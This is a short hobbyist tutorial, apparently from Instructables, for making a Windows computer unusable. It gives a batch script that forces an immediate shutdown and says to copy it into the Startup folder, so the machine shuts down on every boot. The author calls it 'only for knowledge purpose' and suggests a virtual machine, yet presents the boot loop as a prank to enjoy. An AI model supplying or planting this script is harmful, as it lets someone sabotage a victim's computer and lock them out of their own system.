Introduction: Permanently Shutdown Computer

About: I'm crazy about inventing new things..... and thanks a lot to instructables website which helped me to share my ideas...

Hello guys !

This is my another computer trick.........

In this instructable I'm gonna show you how to shutdown computer permanently......

This is only for knowledge purpose .....

Don't try it in your computer.....try this in the virtual machine (ex: vmbox or vmware)........

Step 1: Coding

open notepad and copy the batch script below....

@echo off

start shutdown -s -f -t 00

cls

and save it as anything.bat

Step 2: Go to Startup Folder

ok now we have a batch file....

Go to the startup folder and copy that batch file to the startup folder

Ok thats all you have done it...!

Step 3: Then Restart

restart and see the fun.........

your computer won't start normally....

your computer shutsdown immediately after startup..... :-)

explanation:-

this is becoz ,when your computer startsup it executes the programs in the startup folder....

when your computer startsup it executes the batch file..

.bat ---> this extinction indicates that we are making a batch file....

@echo off Specifies whether to turn the command-echoing feature on or off. start shutdown is a command used to shutdown a computer...

-s indicates that shutdown...

-f indicates that force shutdown...

-t indicates that time duration...(here time duration to wait to shutdown is 00 seconds...so it turns off computer immediately..)...

cls closes command prompt

the batch file again immediately shutdowns the computer when it starts...

so your computer cannot start....it just shutdowns again and again...... :-P


................................. thank you.........................................
If u have any suggestions or comments regarding to this topic plz leave a comment below..... :-)

............................comments are precious.........................